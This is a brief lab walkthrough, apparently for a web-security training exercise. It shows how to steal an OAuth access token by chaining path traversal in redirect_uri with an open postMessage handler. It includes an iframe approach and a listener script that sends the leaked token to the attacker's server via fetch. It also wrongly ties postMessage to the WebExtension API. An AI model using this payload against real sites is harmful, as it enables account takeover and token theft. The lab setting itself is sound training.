Lab link.
First, we check if redirect_uri has a defense against path traversal.
Browse other pages. Requests are followed in the comments section of the blog page. window.location.href and postMessage() are used in the comment section. window.location.href contains the current URL of the browser. postMessage() function is used in WebExtension API to communicate messages between content script and background script. Here the postMessage function in the script sends messages to any source. We will try to steal tokens using this.
In GET /auth?client_id request we copy the URL and create iframe on the exploit server. Here we take advantage of the path traversel in the redirect_uri section and add /post/comment/comment-form here. We need to add a script after the iframe so that the messages are listened to and given as output.
This script sends an HTTP GET request to a specific URL when a message is received.
<script> window.addEventListener(‘message’, function(e) { fetch(“/” + encodeURIComponent(e.data.data)) }, false) </script>
We install the exploit and get the acces token and solve the lab.